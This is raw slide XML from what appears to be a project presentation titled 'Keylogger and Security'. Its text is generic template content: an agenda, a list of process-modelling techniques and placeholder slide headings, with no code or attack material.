              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Data Flow Diagrams</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="5391864"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Process Maps</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="5744766"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="7"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Event-Driven Process Chains</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="6097667"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Gantt Charts</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="6450568"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="9"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>IDEF0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="923092" y="6803469"/>
            <a:ext cx="3428167" cy="289560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Root Cause Analysis</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800362" y="3145512"/>
            <a:ext cx="3717727" cy="2316480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2281"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1425" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>By leveraging these modelling approaches, you'll be able to better align your processes with strategic objectives, reduce inefficiencies, and deliver superior value to your customers. Let's dive in and discover how these techniques can transform the way you think about and manage your business processes.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1425"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3199805"/>
            <a:ext cx="7415927" cy="1064657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>RESULTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4634746"/>
            <a:ext cx="7415927" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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1251494" y="3732133"/>
            <a:ext cx="7415927" cy="2129314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>KEYLOGGER AND SECURITY</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="5167074"/>
            <a:ext cx="7415927" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523074" y="1952786"/>
            <a:ext cx="7415927" cy="1107996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="66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PROJECT TITLE</a:t>
            </a:r>
            <a:endParaRPr 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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="1883688"/>
            <a:ext cx="6172200" cy="771525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="6075"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4860" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4860" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="3148965"/>
            <a:ext cx="12507397" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Outline the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>problem statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> and highlight the key challenges the project aims to address.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="3630335"/>
            <a:ext cx="12507397" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Provide a high-level </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>project overview</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> that summarizes the proposed solution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="4111704"/>
            <a:ext cx="12507397" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Identify the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>target end users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> and explain how the solution caters to their specific needs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="4593074"/>
            <a:ext cx="12507397" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Present the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>value proposition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> of your solution and explain how it offers a unique and compelling approach.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="5074444"/>
            <a:ext cx="12507397" cy="395049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="5"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Discuss the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>technical modeling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> and design considerations behind the solution.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258967" y="5555813"/>
            <a:ext cx="12507397" cy="790099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Showcase the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>expected results</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t> and key performance indicators that will demonstrate the success of the project.</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2074902"/>
            <a:ext cx="7415927" cy="2129314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PROBLEM STATEMENT</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4574500"/>
            <a:ext cx="7415927" cy="1580198"/>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The problem statement outlines the key challenge or issue that the project aims to address. This sets the stage for understanding the project's purpose and the value it can provide.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="194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2272427"/>
            <a:ext cx="7415927" cy="2129314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
